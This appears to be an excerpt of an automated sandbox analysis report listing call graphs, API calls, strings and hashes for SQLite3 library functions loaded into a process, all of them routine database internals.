API calls 31050->31109 31052->31030 31110 61e4279a 92 API calls 31052->31110 31054->31019 31055->31022 31057 61e6ade7 31056->31057 31058 61e6add1 31056->31058 31060 61e5d709 31057->31060 31061 61e6adf5 31057->31061 31062 61e6adfe sqlite3_strnicmp 31057->31062 31111 61e30d09 8 API calls 31058->31111 31060->31030 31074 61e134fc 31060->31074 31113 61e30d09 8 API calls 31061->31113 31063 61e6ae32 31062->31063 31064 61e6aed3 31062->31064 31066 61e6ae49 sqlite3_prepare 31063->31066 31064->31061 31071 61e6aef5 31064->31071 31067 61e6aec6 sqlite3_finalize 31066->31067 31068 61e6ae8c 31066->31068 31067->31060 31068->31067 31069 61e6aea0 31068->31069 31070 61e6aeb2 sqlite3_errmsg 31068->31070 31069->31067 31112 61e30d09 8 API calls 31070->31112 31071->31060 31114 61e30d09 8 API calls 31071->31114 31075 61e13505 31074->31075 31076 61e13514 31074->31076 31075->31076 31077 61e13489 sqlite3_mutex_try 31075->31077 31076->31032 31078 61e134b3 31077->31078 31079 61e134a5 31077->31079 31080 61e134d9 sqlite3_mutex_enter 31078->31080 31115 61e02c6d sqlite3_mutex_leave 31078->31115 31079->31032 31081 61e134cc 31080->31081 31081->31079 31081->31080 31084 61e134fc 3 API calls 31083->31084 31085 61e3cdd8 31084->31085 31087 61e3d26d 31085->31087 31091 61e3cedc memcmp 31085->31091 31093 61e3d272 31085->31093 31094 61e3cf1a memcmp 31085->31094 31096 61e3d19b memcmp 31085->31096 31097 61e3cf93 memcmp 31085->31097 31116 61e3a382 31085->31116 31138 61e0300e 31085->31138 31141 61e8a40a 45 API calls 31085->31141 31142 61e0af6b sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 31085->31142 31143 61e14499 13 API calls 31085->31143 31144 61e2751f sqlite3_log 31085->31144 31145 61e3cd09 69 API calls 31085->31145 31086 61e3d339 31086->31036 31087->31086 31147 61e12a6b 7 API calls 31087->31147 31091->31085 31093->31086 31093->31087 31146 61e39993 69 API calls 31093->31146 31094->31085 31096->31085 31097->31085 31102->31030 31104->31040 31105->31052 31106->31047 31107->31049 31108->31050 31110->31030 31111->31060 31112->31067 31113->31060 31114->31060 31115->31078 31117 61e3a6f3 31116->31117 31122 61e3a39a 31116->31122 31119 61e3a618 31117->31119 31157 61e33049 26 API calls 31117->31157 31118 61e3a7cd 31118->31085 31119->31118 31158 61e130df sqlite3_free sqlite3_free 31119->31158 31122->31119 31123 61e3a4a5 31122->31123 31124 61e3a3c0 31122->31124 31135 61e3a457 31122->31135 31151 61e01632 31122->31151 31123->31119 31125 61e014f9 15 API calls 31123->31125 31128 61e3a678 31123->31128 31132 61e3a6b1 31123->31132 31124->31119 31124->31123 31129 61e01632 43 API calls 31124->31129 31137 61e3a5cb 31124->31137 31125->31128 31126 61e3a693 memcmp 31126->31132 31128->31119 31128->31126 31130 61e3a5b5 31129->31130 31130->31137 31154 61e28b37 sqlite3_log 31130->31154 31132->31117 31156 61e8a40a 45 API calls 31132->31156 31135->31123 31135->31124 31148 61e014f9 31135->31148 31137->31119 31137->31123 31155 61e39ec0 69 API calls 31137->31155 31159 61e029f9 31138->31159 31140 61e0302e 31140->31085 31141->31085 31142->31085 31143->31085 31144->31085 31145->31085 31146->31087 31147->31086 31150 61e272a7 15 API calls 31148->31150 31149 61e01520 31149->31124 31150->31149 31153 61e38c73 43 API calls 31151->31153 31152 61e0165b 31152->31135 31153->31152 31154->31137 31155->31123 31156->31117 31157->31117 31158->31118 31161 61e3bfb0 69 API calls 31159->31161 31160 61e02a18 31160->31140 31161->31160 31162 61e88872 sqlite3_initialize 31163 61e88890 31162->31163 31169 61e88901 31162->31169 31170 61e20001 7 API calls 31163->31170 31165 61e888de 31281 61e1667f sqlite3_free 31165->31281 31166 61e888bb 31166->31165 31171 61e87b71 sqlite3_initialize 31166->31171 31170->31166 31172 61e87ba4 31171->31172 31173 61e87bc0 31171->31173 31174 61e87bb6 31172->31174 31176 61e87bc5 31172->31176 31173->31165 31384 61e261df sqlite3_log 31174->31384 31282 61e12752 31176->31282 31178 61e88829 31180 61e887ec sqlite3_errcode 31178->31180 31179 61e87c44 sqlite3_mutex_enter 31285 61e29833 31179->31285 31182 61e887fb sqlite3_close 31180->31182 31183 61e88807 31180->31183 31181 61e87c18 31181->31178 31181->31179 31187 61e87c37 sqlite3_free 31181->31187 31185 61e88812 sqlite3_free 31182->31185 31183->31185 31185->31173 31186 61e87d31 31188 61e29833 12 API calls 31186->31188 31187->31178 31189 61e87d59 31188->31189 31190 61e29833 12 API calls 31189->31190 31191 61e87d81 31190->31191 31192 61e29833 12 API calls 31191->31192 31193 61e87da9 31192->31193 31194 61e29833 12 API calls 31193->31194 31195 61e87dd1 31194->31195 31196 61e887e1 sqlite3_mutex_leave 31195->31196 31294 61e124a6 31195->31294 31196->31180 31201 61e87e21 31385 61e29307 8 API calls 31201->31385 31202 61e87e63 31322 61e43929 31202->31322 31206 61e87e8e 31206->31196 31207 61e87e53 sqlite3_free 31207->31196 31208 61e134fc 3 API calls 31209 61e87eb4 31208->31209 31386 61e154ba sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 31209->31386 31211 61e87ec1 31387 61e154ba sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 31211->31387 31213 61e87eea 31213->31196 31214 61e87f22 sqlite3_overload_function 31213->31214 31215 61e87f3f 31214->31215 31216 61e87f46 sqlite3_errcode 31214->31216 31215->31216 31217 61e87f5a 31216->31217 31231 61e88269 31216->31231 31219 61e88562 31217->31219 31220 61e87f62 sqlite3_malloc 31217->31220 31218 61e8828c 31218->31219 31225 61e88340 sqlite3_create_module 31218->31225 31223 61e88574 sqlite3_create_function 31219->31223 31230 61e8864a 31219->31230 31220->31219 31222 61e87f7c 31220->31222 31221 61e8827a sqlite3_errcode 31221->31196 31221->31218 31388 61e2635b 12 API calls 31222->31388 31227 61e885be sqlite3_create_function 31223->31227 31223->31230 31225->31219 31229 61e8836a sqlite3_malloc 31225->31229 31226 61e8873c 31233 61e88767 sqlite3_wal_autocheckpoint 31226->31233 31397 61e117d9 sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 31226->31397 31227->31230 31232 61e88604 31227->31232 31228 61e87fc7 31228->31218 31234 61e87fd1 sqlite3_create_function 31228->31234 31229->31230 31235 61e88385 31229->31235 31230->31226 31241 61e886b2 31230->31241 31245 61e8866e sqlite3_create_function 31230->31245 31231->31218 31231->31221 31236 61e882a2 sqlite3_mutex_enter 31231->31236 31246 61e882c7 sqlite3_mutex_leave 31231->31246 31247 61e88315 sqlite3_free 31231->31247 31390 61e29307 8 API calls 31231->31390 31395 61e2635b 12 API calls 31232->31395 31233->31196 31234->31218 31239 61e8801b sqlite3_create_function 31234->31239 31391 61e1a538 8 API calls 31235->31391 31236->31231 31239->31218 31243 61e88061 sqlite3_create_function 31239->31243 31248 61e886c2 sqlite3_create_function 31241->31248 31250 61e88706 31241->31250 31242 61e88624 31242->31230 31396 61e2635b 12 API calls 31242->31396 31243->31218 31253 61e880ab 31243->31253 31244 61e883be 31249 61e887c2 31244->31249 31392 61e1a538 8 API calls 31244->31392 31245->31230 31246->31231 31246->31247 31247->31231 31251 61e88329 31247->31251 31248->31241 31399 61e09d5f sqlite3_free sqlite3_free sqlite3_free 31249->31399 31250->31226 31259 61e88711 sqlite3_create_module 31250->31259 31251->31221 31257 61e880c5 sqlite3_create_function 31253->31257 31267 61e88109 31253->31267 31255 61e883de 31255->31249 31393 61e1a538 8 API calls 31255->31393 31257->31253 31258 61e887d1 sqlite3_free 31258->31219 31259->31250 31262 61e883fe 31262->31249 31263 61e88406 sqlite3_create_function 31262->31263 31263->31249 31264 61e8844c sqlite3_create_function 31263->31264 31264->31249 31265 61e88492 sqlite3_overload_function 31264->31265 31265->31249 31266 61e884b4 sqlite3_overload_function 31265->31266 31266->31249 31269 61e884d6 sqlite3_overload_function 31266->31269 31267->31218 31389 61e2635b 12 API calls 31267->31389 31269->31249 31271 61e884f8 sqlite3_overload_function 31269->31271 31270 61e881d5 31270->31218 31272 61e881df sqlite3_create_function 31270->31272 31271->31249 31273 61e8851a sqlite3_overload_function 31271->31273 31272->31219 31274 61e88228 sqlite3_create_function 31272->31274 31273->31249 31275 61e8853c 31273->31275 31274->31231 31394 61e2635b 12 API calls 31275->31394 31277 61e88558 31277->31219 31398 61e2635b 12 API calls 31277->31398 31279 61e88795 31279->31219 31280 61e8879f sqlite3_create_module 31279->31280 31280->31219 31281->31169 31400 61e10406 31282->31400 31286 61e2986a 31285->31286 31287 61e124a6 9 API calls 31286->31287 31288 61e29893 31287->31288 31290 61e298f7 31288->31290 31293 61e29899 31288->31293 31289 61e124a6 9 API calls 31291 61e298ac 31289->31291 31409 61e29307 8 API calls 31290->31409 31291->31186 31293->31289 31295 61e1253f 31294->31295 31296 61e124bd 31294->31296 31300 61e35227 31295->31300 31296->31295 31410 61e118e8 8 API calls 31296->31410 31298 61e12529 31298->31295 31411 61e0f9d1 sqlite3_free 31298->31411 31301 61e35244 31300->31301 31302 61e3562f sqlite3_malloc64 31301->31302 31303 61e35262 memcmp 31301->31303 31305 61e352b5 31302->31305 31315 61e355aa sqlite3_vfs_find 31302->31315 31303->31302 31304 61e35282 sqlite3_malloc64 31303->31304 31304->31305 31311 61e352bf 31304->31311 31305->31201 31305->31202 31308 61e35681 sqlite3_mprintf 31309 61e35694 31308->31309 31310 61e3569e sqlite3_free 31309->31310 31310->31305 31312 61e352d3 31311->31312 31313 61e35305 memcmp 31311->31313 31319 61e35321 sqlite3_mprintf 31311->31319 31312->31315 31316 61e3557b memcmp 31312->31316 31317 61e355af memcmp 31312->31317 31318 61e354ca memcmp 31312->31318 31312->31319 31320 61e3551c memcmp 31312->31320 31321 61e355fa sqlite3_mprintf 31312->31321 31313->31312 31313->31319 31315->31305 31315->31308 31316->31312 31317->31312 31318->31312 31319->31309 31320->31312 31321->31310 31323 61e4394b strcmp 31322->31323 31324 61e43975 31322->31324 31323->31324 31356 61e43c91 31323->31356 31325 61e12752 4 API calls 31324->31325 31324->31356 31339 61e439d5 31325->31339 31326 61e12752 4 API calls 31327 61e43e5e 31326->31327 31329 61e43e64 31327->31329 31330 61e43e76 31327->31330 31328 61e445e4 31328->31206 31328->31208 31416 61e0f9d1 sqlite3_free 31329->31416 31333 61e43f7d 31330->31333 31417 61e0f9d1 sqlite3_free 31330->31417 31331 61e43c15 31335 61e12752 4 API calls 31331->31335 31334 61e44046 31333->31334 31338 61e01632 43 API calls 31333->31338 31418 61e14499 13 API calls 31334->31418 31346 61e43c2d 31335->31346 31351 61e43fd2 31338->31351 31339->31328 31339->31331 31341 61e10406 4 API calls 31339->31341 31340 61e4447a 31342 61e4447f sqlite3_free sqlite3_free 31340->31342 31345 61e43a68 31341->31345 31378 61e44436 31342->31378 31343 61e43e71 31343->31342 31421 61e43843 87 API calls 31343->31421 31347 61e43a90 31345->31347 31348 61e43a7e sqlite3_free 31345->31348 31346->31340 31355 61e10406 4 API calls 31346->31355 31346->31356 31350 61e43a99 31347->31350 31359 61e43aca sqlite3_free sqlite3_free 31347->31359 31348->31328 31349 61e444da sqlite3_mutex_leave 31349->31328 31360 61e43afb sqlite3_mutex_enter 31350->31360 31352 61e440a9 31351->31352 31353 61e4401d sqlite3_uri_boolean 31351->31353 31361 61e43dd1 31352->31361 31419 61e0a94d sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 31352->31419 31353->31334 31358 61e4404c sqlite3_uri_boolean 31353->31358 31377 61e43cf9 31355->31377 31356->31326 31356->31343 31357 61e4414a sqlite3_free 31357->31361 31358->31334 31359->31328 31412 61e0172e 31360->31412 31361->31343 31367 61e014f9 15 API calls 31361->31367 31368 61e44270 31361->31368 31364 61e43b22 31365 61e43b35 strcmp 31364->31365 31366 61e43bf8 sqlite3_mutex_leave sqlite3_free 31364->31366 31371 61e43b65 31364->31371 31365->31364 31366->31331 31382 61e44390 31366->31382 31367->31368 31368->31343 31383 61e44543 31368->31383 31420 61e14499 13 API calls 31368->31420 31369 61e134fc 3 API calls 31369->31378 31370 61e43bd6 31370->31366 31371->31370 31375 61e43b9a sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 31371->31375 31373 61e43dc4 31415 61e0f9d1 sqlite3_free 31373->31415 31375->31328 31376 61e44355 31376->31343 31376->31382 31376->31383 31377->31343 31377->31356 31377->31373 31414 61e28b37 sqlite3_log 31377->31414 31378->31328 31378->31349 31380 61e43db2 31380->31356 31380->31373 31381 61e44586 sqlite3_mutex_enter sqlite3_mutex_leave 31381->31383 31382->31369 31383->31343 31383->31381 31384->31173 31385->31207 31386->31211 31387->31213 31388->31228 31389->31270 31390->31247 31391->31244 31392->31255 31393->31262 31394->31277 31395->31242 31396->31230 31397->31233 31398->31279 31399->31258 31401 61e10422 31400->31401 31402 61e104f6 31400->31402 31401->31402 31403 61e1043d sqlite3_mutex_enter 31401->31403 31402->31181 31404 61e10453 31403->31404 31407 61e104aa 31404->31407 31408 61e09a9e sqlite3_mutex_leave sqlite3_mutex_enter 31404->31408 31405 61e104e5 sqlite3_mutex_leave 31405->31402 31407->31405 31408->31407 31409->31291 31410->31298 31411->31295 31413 61e01737 sqlite3_mutex_enter 31412->31413 31413->31364 31414->31380 31415->31361 31416->31343 31417->31333 31418->31352 31419->31357 31420->31376 31421->31340 31422 61e17f2e 31423 61e182eb 31422->31423 31424 61e17f3d 31422->31424 31424->31423 31425 61e17f5f sqlite3_mutex_enter 31424->31425 31426 61e17f81 31425->31426 31434 61e17f9e 31425->31434 31428 61e17f8a sqlite3_config 31426->31428 31426->31434 31427 61e180d5 sqlite3_mutex_leave sqlite3_mutex_enter 31429 61e1828c sqlite3_mutex_leave sqlite3_mutex_enter 31427->31429 31435 61e18100 31427->31435 31428->31434 31430 61e182b3 sqlite3_mutex_free 31429->31430 31431 61e182ca sqlite3_mutex_leave 31429->31431 31430->31431 31431->31423 31432 61e1808d sqlite3_mutex_leave 31432->31423 31434->31427 31434->31432 31435->31429 31436 61e1815d sqlite3_malloc 31435->31436 31438 61e1818a sqlite3_config 31435->31438 31439 61e1819e 31435->31439 31437 61e181b8 sqlite3_free sqlite3_os_init 31436->31437 31440 61e1817c 31436->31440 31437->31440 31438->31439 31439->31436 31439->31440 31440->31429

                                                                                                    Executed Functions

                                                                                                    Function 61E87B71 Relevance: 97.0, APIs: 38, Strings: 17, Instructions: 753COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 61e87b71-61e87b9e sqlite3_initialize 1 61e87ba4-61e87bb4 0->1 2 61e88837-61e8883e 0->2 3 61e87bc5-61e87bce 1->3 4 61e87bb6-61e87bc0 call 61e261df 1->4 6 61e87bd0-61e87bd3 3->6 7 61e87be6-61e87beb 3->7 4->2 6->7 9 61e87bd5-61e87bdf 6->9 10 61e87bed-61e87bf2 7->10 11 61e87bf4-61e87bfb 7->11 9->7 12 61e87c02 10->12 13 61e87bfd 11->13 14 61e87c05-61e87c1c call 61e12752 11->14 12->14 13->12 17 61e88829-61e8882b 14->17 18 61e87c22-61e87c24 14->18 21 61e887ec-61e887f9 sqlite3_errcode 17->21 19 61e87c44-61e87dd5 sqlite3_mutex_enter call 61e29833 * 5 18->19 20 61e87c26-61e87c35 call 61e0172e 18->20 39 61e87ddb-61e87e1f call 61e124a6 call 61e35227 19->39 40 61e887e1-61e887e7 sqlite3_mutex_leave 19->40 20->19 30 61e87c37-61e87c3f sqlite3_free 20->30 23 61e887fb-61e88805 sqlite3_close 21->23 24 61e88807-61e88809 21->24 27 61e88812-61e88827 sqlite3_free 23->27 24->27 28 61e8880b 24->28 27->2 28->27 30->17 45 61e87e21-61e87e24 39->45 46 61e87e63-61e87e85 call 61e43929 39->46 40->21 47 61e87e2d-61e87e5e call 61e29307 sqlite3_free 45->47 48 61e87e26-61e87e28 call 61e0a42b 45->48 50 61e87e8a-61e87e8c 46->50 47->40 48->47 53 61e87ea9-61e87ecb call 61e134fc call 61e154ba 50->53 54 61e87e8e-61e87ea4 call 61e16f7c 50->54 62 61e87ecd-61e87ed3 53->62 63 61e87ed6-61e87f13 call 61e0ae68 call 61e154ba 53->63 54->40 62->63 63->40 68 61e87f19-61e87f3d call 61e16f7c sqlite3_overload_function 63->68 71 61e87f3f-61e87f41 call 61e0a42b 68->71 72 61e87f46-61e87f54 sqlite3_errcode 68->72 71->72 74 61e88269-61e8826b 72->74 75 61e87f5a-61e87f5c 72->75 76 61e8832e-61e88332 74->76 77 61e88271-61e88278 74->77 78 61e88562-61e88566 75->78 79 61e87f62-61e87f76 sqlite3_malloc 75->79 76->78 84 61e88338-61e8833a 76->84 80 61e8827a-61e88286 sqlite3_errcode 77->80 81 61e88291-61e88296 77->81 85 61e8864c-61e88650 78->85 86 61e8856c-61e8856e 78->86 82 61e87f7c-61e87fcb call 61e2635b 79->82 83 61e8882d-61e88832 79->83 80->40 88 61e8828c 80->88 93 61e88298-61e882b6 call 61e0172e sqlite3_mutex_enter 81->93 82->76 105 61e87fd1-61e88015 sqlite3_create_function 82->105 83->78 84->78 90 61e88340-61e88364 sqlite3_create_module 84->90 91 61e8873c-61e8873e 85->91 92 61e88656-61e88658 85->92 86->85 87 61e88574-61e885b8 sqlite3_create_function 86->87 87->85 94 61e885be-61e88602 sqlite3_create_function 87->94 88->76 90->78 98 61e8836a-61e8837f sqlite3_malloc 90->98 95 61e88740-61e88742 call 61e16f7c 91->95 96 61e88747-61e8874e 91->96 92->95 99 61e8865e-61e88663 92->99 115 61e882b8-61e882c1 93->115 116 61e882c3-61e882c5 93->116 94->85 101 61e88604-61e88628 call 61e2635b 94->101 95->96 103 61e88750-61e88762 call 61e117d9 96->103 104 61e88767-61e88777 sqlite3_wal_autocheckpoint 96->104 98->85 106 61e88385-61e883c0 call 61e1a538 98->106 107 61e88665-61e88668 99->107 101->85 127 61e8862a-61e8864a call 61e2635b 101->127 103->104 104->40 105->76 111 61e8801b-61e8805b sqlite3_create_function 105->111 129 61e887c2 106->129 130 61e883c6-61e883e0 call 61e1a538 106->130 113 61e8866a-61e8866c 107->113 114 61e886b2-61e886b7 107->114 111->76 118 61e88061-61e880a5 sqlite3_create_function 111->118 113->114 120 61e8866e-61e886b0 sqlite3_create_function 113->120 122 61e886b9-61e886bc 114->122 121 61e882c7-61e882de sqlite3_mutex_leave 115->121 116->121 118->76 128 61e880ab-61e880ba 118->128 120->107 123 61e882e0-61e882f6 121->123 124 61e88315-61e88323 sqlite3_free 121->124 125 61e886be-61e886c0 122->125 126 61e88706 122->126 123->124 148 61e882f8-61e88310 call 61e29307 123->148 124->93 134 61e88329 124->134 125->126 131 61e886c2-61e88704 sqlite3_create_function 125->131 133 61e88708-61e8870b 126->133 127->85 136 61e880bc-61e880be 128->136 132 61e887c7-61e887dc call 61e09d5f sqlite3_free 129->132 130->129 146 61e883e6-61e88400 call 61e1a538 130->146 131->122 132->78 133->91 141 61e8870d-61e8870f 133->141 134->80 143 61e88109-61e8810b 136->143 144 61e880c0-61e880c3 136->144 141->91 150 61e88711-61e8873a sqlite3_create_module 141->150 143->76 147 61e88111-61e88123 143->147 144->143 145 61e880c5-61e88107 sqlite3_create_function 144->145 145->136 146->129 157 61e88406-61e88446 sqlite3_create_function 146->157 152 61e88125-61e88127 147->152 148->124 150->133 155 61e88129-61e8812c 152->155 156 61e8815b-61e8815d 152->156 155->156 158 61e8812e-61e88159 155->158 156->76 159 61e88163-61e88175 156->159 157->132 160 61e8844c-61e8848c sqlite3_create_function 157->160 158->152 161 61e88177-61e88179 159->161 160->132 162 61e88492-61e884ae sqlite3_overload_function 160->162 164 61e8817b-61e8817e 161->164 165 61e881ae-61e881b0 161->165 162->132 167 61e884b4-61e884d0 sqlite3_overload_function 162->167 164->165 168 61e88180-61e881ac 164->168 165->76 166 61e881b6-61e881d9 call 61e2635b 165->166 166->76 174 61e881df-61e88222 sqlite3_create_function 166->174 167->132 170 61e884d6-61e884f2 sqlite3_overload_function 167->170 168->161 170->132 172 61e884f8-61e88514 sqlite3_overload_function 170->172 172->132 175 61e8851a-61e88536 sqlite3_overload_function 172->175 174->78 176 61e88228-61e88267 sqlite3_create_function 174->176 175->132 177 61e8853c-61e8855c call 61e2635b 175->177 176->74 177->78 180 61e88779-61e88799 call 61e2635b 177->180 180->78 183 61e8879f-61e887bd sqlite3_create_module 180->183 183->78
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E87B97
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E87C3A
                                                                                                    • sqlite3_errcode.SQLITE3 ref: 61E887EF
                                                                                                    • sqlite3_close.SQLITE3 ref: 61E88800
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E8881D
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: Ta$'a$3Oa$BINARY$NOCASE$RTRIM$`Qa$fts3$fts4$fts5$fts5vocab$porter$rtree$rtree_i32$simple$unicode61$a
                                                                                                    • API String ID: 1444984659-3772028164
                                                                                                    • Opcode ID: 123a69d633dfa0828cc75513eecb3859b1835af812d5066100662b2363b135b7
                                                                                                    • Instruction ID: 3f0d45df463f7b651d146f343d333c4606a7f4b1179d4b2f89f40fe6038025a8
                                                                                                    • Opcode Fuzzy Hash: 123a69d633dfa0828cc75513eecb3859b1835af812d5066100662b2363b135b7
                                                                                                    • Instruction Fuzzy Hash: 457208B0A083428FE740DF69C59574ABBF1BF84348F24C92DE8998B395D779C845DB82
                                                                                                    Function 61E183F0 Relevance: 7.5, APIs: 5, Instructions: 28COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 734 61e183f0-61e18467 GetSystemInfo sqlite3_vfs_register * 4
                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNEL32(?,?,61E9D560,?,61E181C5,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1840A
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E18420
                                                                                                      • Part of subcall function 61E1838D: sqlite3_initialize.SQLITE3(?,?,61E18425), ref: 61E18398
                                                                                                      • Part of subcall function 61E1838D: sqlite3_mutex_enter.SQLITE3(?,?,61E18425), ref: 61E183B0
                                                                                                      • Part of subcall function 61E1838D: sqlite3_mutex_leave.SQLITE3(?), ref: 61E183E2
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E18434
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E18448
                                                                                                    • sqlite3_vfs_register.SQLITE3 ref: 61E1845C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3532963230-0
                                                                                                    • Opcode ID: 52ec4a19fc2aab4ae50ae70de22719532ee0c0d1c432b0c0c6795e77d9853fff
                                                                                                    • Instruction ID: 3edd3a8b6566b9c5a4dd8858fafa9583b9544e3ccdbc01ac2b2094e74ba9939f
                                                                                                    • Opcode Fuzzy Hash: 52ec4a19fc2aab4ae50ae70de22719532ee0c0d1c432b0c0c6795e77d9853fff
                                                                                                    • Instruction Fuzzy Hash: 47F05EB01082009BC3407F64D10B71EBAE5AFC3708F25C91CD0C887290C771D4819B93
                                                                                                    Function 61E43929 Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 762stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                                    • String ID: -journal$@
                                                                                                    • API String ID: 42632313-41206085
                                                                                                    • Opcode ID: a93bc94ad71ed339d8b4608d1f49caa565431d3ff91f8c48fe0859b6d92ce3c1
                                                                                                    • Instruction ID: ff9e617349dca51026d64508cef5f65b60382efde76bf602cff4c7a40dee043a
                                                                                                    • Opcode Fuzzy Hash: a93bc94ad71ed339d8b4608d1f49caa565431d3ff91f8c48fe0859b6d92ce3c1
                                                                                                    • Instruction Fuzzy Hash: 1D820474A042658FEB20CF68D884B89BBF1BF49308F29C1E9D8589B352D774D985CF51
                                                                                                    Function 61E38C73 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 258fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
